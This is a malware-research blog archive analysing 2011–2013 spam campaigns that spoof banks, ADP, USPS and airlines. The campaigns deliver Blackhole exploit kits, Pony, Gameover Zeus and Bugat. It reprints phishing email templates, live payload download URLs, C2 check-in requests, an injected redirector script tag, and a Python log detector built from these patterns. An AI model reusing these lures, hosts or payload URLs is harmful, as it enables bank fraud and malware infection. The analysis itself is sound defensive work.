Category Archives: Botnet

Update: 950 Euro transfer to Intesa Sanpaolo

New Hostile URLs observed on April 5, 2013:

Each of these pages contains an encoded script that redirects to a Blackhole exploit kit v2.x at hxxp://bangpleasure.com/news/wanting_book_switch.php. This BH kit was hosted at IP address 97.107.142.157 at the time of this writing.

950 Euro transfer to Intesa Sanpaolo

On April 04, 2013 we analyzed a spam run distributed by the Cutwail spambot using the theme “950 Euro transfer to Intesa Sanpaolo”:

Spam Subject(s):

Si deve essere attestato a 950,00 à dal tuo conto corrente bancario presso Intesa anPaolo.
Richiesta di ammortamento di à 950,00 dal conto bancario di Intesa SanPaolo
Gli ammortamenti delle 950,00 à dal tuo conto bancario in Intesa SanPaolo
à 950,00 sono dal vostro conto di Intesa SanPaolo ammortizzato in 24 ore

Spam Template:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY>

Gentile Cliente, <br>
Abbiamo ricevuto la richiesta di ammortamento di à 950,00 dal proprio conto bancario in Intesa SanPaolo per risolvere la consegna dei documenti. <br>L'ammortamento dei fondi e la trasmissione di documenti ulteriori fatto in 24 ore.<br><br>
<a href="hxxp://herr-pferd.de/info1.html">Vedi i dettagli dell'ordine </a> <br>
Cordiali saluti, Servizio clienti sostegno della Intesa SanPaolo Banca.<br>
</BODY></HTML>

Hostile URL(s):


The text ‘Vedi i dettagli dell’ordine’ is a hyperlink to one of the hostile URLs. That page contains an encoded script that redirects to a Blackhole exploit kit v2.x at hxxp://23.advertisingspecialties.biz/news/wanting_book_switch.php. This BH kit was hosted at IP address 96.126.106.62 at the time of this writing.

The kit attempts to download the following files/exploits:

hxxp://23.advertisingspecialties.biz/news/wanting_book_switch.php?tsltj=1l:30:1l:32:32&gmon=3j&eyoyoeuy=1o:30:32:30:1h:1j:1i:1f:1n:33&ggievtn=1o:1d:1f:1d:1f:1d:1f
Name: a4ccf.pdf
Identifier: CVE-2010-0188 exploit
Type: PDF document, version 1.6
Size: 9895 bytes
MD5sum: 1ef1040ba77c13ddc268ca34a4b030c6

If exploitation is successful, the victim is redirected to hxxp://23.advertisingspecialties.biz/news/wanting_book_switch.php?fvpcpp=1l:30:1l:32:32&irzg=1o:30:32:30:1h:1j:1i:1f:1n:33&phrua=1i&nlcdd=obmoxwk&fdrehtz=gfyuft and a Pony variant with the following properties is downloaded:

Name: contacts.exe
Identifier: Pony downloader
Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size: 150,528 bytes
MD5: c42105cc624659827773cb62de516d5a

Pony downloader posts to its dropzone at:

hxxp://3ecompany.com:8080/forum/viewtopic.php
hxxp://23.advertisingspecialties.biz/forum/viewtopic.php
hxxp://23.area-plumbing-company.com/forum/viewtopic.php
hxxp://23.debtfreein100days.com/forum/viewtopic.php

Pony downloader was configured to download Gameover Zeus payloads from the following locations:

1. hxxp://agarest.com/dckWfjue.exe
2. hxxp://kj-supply.com/JUz8cnK.exe
3. hxxp://chadgunderson.com/ZUmJx.exe

Gameover installs itself as %APPDATA%\Ppro\rfluo.exe and has the following file properties:

File: rfluo.exe
Size: 376,832 bytes
MD5: 6e65ca8fa550b03d1f377cc1c685abd8
Build TimeStamp: 2013-03-16 18:17:58
Language Code: Russian
Character Set: Unicode
Company Name: Корпорация Майкрософт
File Description: Монитор устройств неподвижных изображений
File Version: 5.1.2600.5512 (xpsp.080413-0852)

The Gameover variant had a botid of “candyshop” and a cid of 8888. The following P2P drones were found embedded inside the Gameover Zeus payload:


Scanned Image from a Xerox WorkCentre

We analyzed the following malicious attachment, used in Xerox Scanned Image themed spam on February 14, 2013:

Spam Subject:
Scanned Image from a Xerox WorkCentre

Spam Template:

Device Name: Not Set
Device Model: Scab-3871N
Location: Not Set

File Format: PDF (Medium)
File Name: Scan_02-13-2013-245.zip
Resolution: 200dpi x 200dpi

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: hxxp://www.adobe.com/

File: Scan_02-13-2013_245.zip
MD5: 2688370c5fd8bc197141a55d43883ad4
Size: 117,606 bytes

Pony downloader posts to its dropzone at hxxp://88.190.210.199/ponyb/gate.php. It was also configured to download 3 Gameover Zeus payloads from the following locations:

1. hxxp://www.inaji.jp/5Ncs.exe
2. hxxp://w6050v1kc.homepage.t-online.de/KYrngX.exe
3. hxxp://socialighter.co.za/3N0k.exe

Gameover installs itself as %APPDATA%\Iriwb\tuoqf.exe and has the following file properties:

File: tuoqf.exe
MD5: cd08cfedf5033ce7b18a0e1be4d23501
Size: 309,760 bytes
Time-Stamp: 2013-02-5 20:09:27

This Gameover Zeus variant posts to a dropzone at 66.229.110.89:28898. Webinjects were downloaded from 174.110.150.207:23173. The Gameover variant had a botid of “dotf14”.

The following P2P drones were found embedded inside the Gameover Zeus payload:


First Foundation Bank Secure Email Notification

We analyzed the following malicious attachment, used in First Foundation Bank themed spam on February 14, 2013:

Spam Subject:
First Foundation Bank Secure Email Notification – 29834077

Mail From:
“FF-inc Secure Notification” <secure.notification@ff-inc.com>

Spam Template:

You have received a secure message

Read your secure message by opening the attachment, secure_mail_29834077. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser. To access from a mobile device, forward this message to mobile@res.ff-inc.com to receive a mobile login URL.

If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.230.9081.

2000-2013 First Foundation Inc. All rights reserved.

File: secure_mail_29834077.zip
MD5: e6454c2cb43c669906fcdbe199a195f3
Size: 118,086 bytes

Pony downloader posts to its dropzone at hxxp://88.190.210.199/ponyb/gate.php. It was also configured to download 3 Gameover Zeus payloads from the following locations:

1. hxxp://angeloelacicca.altervista.org/kcprVD.exe
2. hxxp://www.dalcin.it/d2sqx.exe
3. hxxp://geeksleaks.com/h0L7.exe

Gameover installs itself as %APPDATA%\Qaajda\okubha.exe and has the following file properties:

File: okubha.exe
MD5: e1b3e6a075ac40ff5ecc8c37d3bbced4
Size: 309,760 bytes
Time-Stamp: 2013-02-5 20:09:27

This Gameover Zeus variant posts to a dropzone at 99.109.198.196:21961. Webinjects were downloaded from 174.110.150.207:23173. The Gameover variant had a botid of “citif14”.

The following P2P drones were found embedded inside the Gameover Zeus payload:


Action Required – Time Sensitive Material (Detma.org)

We analyzed the following malicious attachment, used in Detma.org themed spam on February 12, 2013:

Spam Subject:
Action Required – Time Sensitive Material

From Address:
“Unemployment Assistance@detma.org” <info@detma.org>

Spam Template:

Action Required

File: case#95648678394857345~93245725793248.zip
MD5: dd28a6cc3df2b1608dc15a4b397013b4
Size: 102,170 bytes

Pony downloader posts to its dropzone at hxxp://carmine.warsheet.com/forum/viewtopic.php, hosted at IP address 174.122.102.165. It was also configured to download 3 Gameover Zeus payloads from the following locations:

1. hxxp://seunig.de/L5Fvb.exe
2. hxxp://limitedltd.be/CtSfQca3.exe
3. hxxp://visiterlareunion.fr/3gyrJ8B8.exe

Gameover installs itself as %APPDATA%\Ixra\osso.exe and has the following file properties:

File: oss.exe
Size: 309,760 bytes
MD5: 93e6daf13f5239af3d7a44ecfee1b3c5
Time-Stamp: 2013-02-05 20:09:27

This Gameover Zeus variant posts to a dropzone at 180.251.247.89:12043. Webinjects were downloaded from 95.137.226.107:12656. The Gameover variant had a botid of “bofaf12” and a cid of 5555.

The following P2P drones were found embedded inside the installed Gameover Zeus payload:


ADP Funding Notification – Debit Draft

We've been quiet recently, but we haven't stopped our work. Behind the scenes we've been developing some new tools and techniques that we hope will enable us to more efficiently track the bad guys. We used some of these new tools and techniques in our analysis of a new spam run today that spoofed communications from ADP. We observed spam messages with the subject line “ADP Funding Notification – Debit Draft”. The spam sample we analyzed was sent from 78.96.173.243 – a known Cutwail spambot.

The link in this message directed victims to junnioreadriano.com.br/MZ0PnMj5/index.html. Note that our bad guys are still using the same /8-random-character/index.html pattern. This page contained the following two malicious javascript redirectors:

http://ftp.leocardz.com/BhSFTbq9/js.js
http://www.webondemand.altervista.org/V4uags9T/js.js

These JavaScript redirectors sent victims to a Blackhole Exploit Kit at 50.116.38.183. This Blackhole exploit kit was hosting at least 9 different malicious payloads. Detected malware payloads, identified by MD5 hash, included the following:


All of these binaries appear, upon initial inspection, to be Pony downloaders.

Contact to the nearest post office

On 2012-04-26 we observed a round of USPS flavored spam. We analyzed a spam message with the subject line “Contact to the nearest post office”. The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader was installed on the victim's filesystem at C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe.

This downloader sent the following GET request to a control server at everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included a spam template to be used in spamming operations. The downloaded spam template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="%%BND:1%%"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:


We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.

Confirm your US airways online reservation

On 2011-04-09 we observed an interesting round of US Airways spam. The sample we analyzed had a subject line of “Confirm your US airways online reservation”.

While this same template had been previously used in high-profile Gameover Zeus laden spam campaigns, this particular campaign was a bit different. The sample we analyzed had a link to a malicious page at go2gamers.com/us.html. Other spam samples from the same campaign had links to hacked websites with malicious us.html pages.

The malicious us.html page contained javascript that redirected victims to a Blackhole Exploit Kit at bamboozlefitclub.net/main.php?page=745b81e2608709b2. The bamboozlefitclub.net domain resolved to 85.189.11.134.

This Blackhole kit dropped a Bugat* payload with the following properties:

File: about.exe
Size: 71680
MD5: D1455B0C28A145C5D207F276F945ABCA

Unlike other Bugat payloads that we've documented here, which used a domain generation algorithm to determine their command and control server, this variant was hardcoded to connect to 4 domains for command and control instructions. This variant was configured to connect to the following:

scanforsecurytyholes.ru
testnosecurity.ru
securytycheckme.ru
krjjfgzzzooooem.ru

The scanforsecurytyholes.ru and securytycheckme.ru domains are currently offline. The other domains resolved to 91.201.4.142. After this variant successfully connected to the first available command and control server, in this case testnosecurity.ru/mev/in, it downloaded a configuration file that included a target list of over 400 websites. The vast majority of these targets were financial institutions. If you'd like a copy of the target list hit us up at spamalysis@gmail.com.

The downloaded configuration file also revealed the location of the domains hosting web injects. Bugat, and other banking malware, use web injects to dynamically man-in-the-middle a victim's online banking session. Basically, when a victim logs into their bank's website these web injects take control of the session and steal the victim's banking information in real time. The webinjects used by this Bugat variant were pulled from http://lavonoplanet.ru/mev/in/cp.php. The domain lavonoplanet.ru resolved to 91.201.4.142.

In addition to providing a configuration file, the command and control server at testnosecurity.ru also pushed a Bugat update on its victims. This updated Bugat payload had the following properties:

Size: 75271
MD5: 0386F4D83DD84D2F60352E00D3F504A6

This updated variant was configured to connect to the following command and control servers:

securytycheckme.ru
sexnotincity.ru

The domain securytycheckme.ru was offline, but the domain sexnotincity.ru resolved to 91.201.4.143. It seems like these guys like to host their domains in the same neighborhood. Mental note … stay out of this /24.

The updated Bugat variant pulled its webinjects from the following domains:

http://gloogle.in/mev/in/cp.php
https://meredianstatserv.com/aqweb/in.php

We apologize for not reporting on this one sooner but unfortunately our real lives got in the way this week.

* note, what we call Bugat others call Feodo or Cridex.

Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. This page contained the following javascript redirector:

<script type="text/javascript" src="http://axislegal.com.au/gcq37VtM/js.js"></script>

The above javascript redirected victims to a Blackhole Exploit Kit at http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits including the latest and greatest Java Exploit CVE-2012-0507. This malicious .jar file had the following properties:

File: Klot.jar
Size: 15719
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301096
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.

Your AT&T wireless bill is ready to view

On 2012-04-03 we observed another new spam template circulating in the wild. This spam template spoofed communications from AT&T Wireless. I guess the Verizon Wireless spam campaigns we've seen in the last few weeks were a success and the spammers behind these attacks decided to try out a new brand. The AT&T Wireless spam template that we analyzed had a subject line of “Your AT&T wireless bill is ready to view”.

The spam message that we analyzed was loaded with malicious links. These links were as follows:

Each spam message associated with this campaign likely contains a different assortment of malicious links. The common characteristic of all these malicious links is that they all contain a random set of 8 alpha-numeric characters in the URI path. This identifier has remained consistent across all the different spam templates associated with this particular campaign.

The malicious pages above hosted the following javascript redirectors:

Note that these javascript redirectors also contained the same pattern of 8 alpha-numeric characters in the URI path.

These JavaScript redirectors sent victims to a Blackhole Exploit kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff.
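
The URL patterns called out across these posts (the /8-random-character/index.html and js.js redirectors noted in the ADP and AT&T posts, the showthread.php?t= and main.php?page= Blackhole landing pages, the colon-encoded query strings of the Blackhole 2.x kit in the Intesa Sanpaolo post, and the index.php?r=gate check-in from the USPS post) can be turned into proxy-log detection logic. The following is an added example, not tooling from this blog; it assumes Squid native-format access logs, and the sample lines and hostnames are constructed with reserved example names.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Patterns derived from the URLs reported in the posts above.
HEX16 = re.compile(r"^[0-9a-f]{16}$")
# compromised-site redirector: /<8 alphanumeric>/index.html or /<8 alphanumeric>/js.js
RANDOM8_PATH = re.compile(r"^/[A-Za-z0-9]{8}/(?:index\.html|js\.js)$")
# Blackhole 2.x query values look like 1l:30:1l:32:32 (colon-separated 1-2 char tokens)
BH2_VALUE = re.compile(r"^[0-9a-z]{1,2}(?::[0-9a-z]{1,2}){3,}$")


def _single(qs, key):
    """Return the query value for key if it occurs exactly once, else None."""
    vals = qs.get(key, [])
    return vals[0] if len(vals) == 1 else None


def classify_url(url):
    """Return the names of every rule the URL matches (empty list if nothing fires)."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    leaf = parts.path.rsplit("/", 1)[-1]
    hits = []
    if RANDOM8_PATH.match(parts.path):
        hits.append("random8-redirector")
    # Blackhole 1.x landing pages: showthread.php?t=<16 hex> or main.php?page=<16 hex>
    if leaf == "showthread.php" and HEX16.match(_single(qs, "t") or ""):
        hits.append("blackhole1-landing")
    if leaf == "main.php" and HEX16.match(_single(qs, "page") or ""):
        hits.append("blackhole1-landing")
    # Blackhole 2.x: a .php script carrying two or more colon-encoded query values
    colon_values = sum(1 for vals in qs.values() for v in vals if BH2_VALUE.match(v))
    if leaf.endswith(".php") and colon_values >= 2:
        hits.append("blackhole2-kit")
    # downloader check-in: index.php?r=gate&id=<bot id>&group=<campaign tag>
    if leaf == "index.php" and _single(qs, "r") == "gate" and "id" in qs:
        hits.append("loader-gate-checkin")
    return hits


def scan_log(lines):
    """Scan Squid native-format log lines (method is field 6, URL is field 7).

    Returns a list of (line_number, url, rule_names) for each suspicious request.
    """
    findings = []
    for number, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 7 or fields[5] not in ("GET", "POST"):
            continue
        rules = classify_url(fields[6])
        if rules:
            findings.append((number, fields[6], rules))
    return findings


# Constructed sample log; hosts use reserved example names, not real infrastructure.
SAMPLE_LOG = [
    "1335443528.101 312 10.0.0.12 TCP_MISS/200 2311 GET http://hacked-site.example/MZ0PnMj5/index.html - DIRECT/203.0.113.10 text/html",
    "1335443528.402 88 10.0.0.12 TCP_MISS/200 901 GET http://other-site.example/BhSFTbq9/js.js - DIRECT/203.0.113.11 application/javascript",
    "1335443529.010 640 10.0.0.12 TCP_MISS/200 40211 GET http://198.51.100.7/showthread.php?t=d7ad916d1c0396ff - DIRECT/198.51.100.7 text/html",
    "1335443531.220 150 10.0.0.12 TCP_MISS/200 44 GET http://c2.example/ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 - DIRECT/203.0.113.12 text/html",
    "1335443532.000 20 10.0.0.13 TCP_HIT/200 5120 GET http://www.example.com/index.html - NONE/- text/html",
    "1335443533.000 700 10.0.0.14 TCP_MISS/200 9895 GET http://kit.example/news/wanting_book_switch.php?tsltj=1l:30:1l:32:32&gmon=3j&eyoyoeuy=1o:30:32:30:1h:1j:1i:1f:1n:33 - DIRECT/203.0.113.13 application/pdf",
]

if __name__ == "__main__":
    for number, url, rules in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(rules)}  {url}")
```

Run as a script it prints one line per flagged request; the benign www.example.com request is not reported.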

As with the previous Blackhole Exploit kits we've documented on this blog, this exploit kit targets an assortment of PDF, Flash, MSFT, and Java vulnerabilities. The most effective exploit code hosted at this and other Blackhole kits used in this ongoing campaign appears to be the Java Atomic exploit, which targets CVE-2012-0507. This exploit was hosted on the Blackhole Exploit kit at 174.140.171.100 as a .jar file with the following properties:

File: Pol.jar
Size: 14314
MD5: 8050B15A9D6A530BBADC564813BCB2EB

This .jar file was only detected by 2 of 41 AV Vendors on Virustotal.

The Blackhole Exploit Kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff dropped the following Pony downloader on vulnerable victims:

File: contacts.exe
Size: 95272
MD5: FFDC8980585A48DF7B63388A1B3C3642

This Pony variant was configured to send stolen FTP and other web admin credentials to dropzones at:

We know that 91.121.178.156 was previously home to a Blackhole Exploit Kit. We know because urlQuery.net told us. While the domain subdatapro.com is not currently on our radar, we would not be surprised if it served a Blackhole Exploit Kit in the not too distant future.

The Pony variant (FFDC8980585A48DF7B63388A1B3C3642) was also configured to download a Gameover Zeus variant from the following locations:

This Gameover Zeus variant had the following properties:

Size: 296488
MD5: 54A3D8C0F15E16655CAF35306EFC87E5

This variant had a botid of NRa3. The criminals behind this campaign utilized a proxy at 77.43.1.67:443 to control victims infected with this Gameover variant.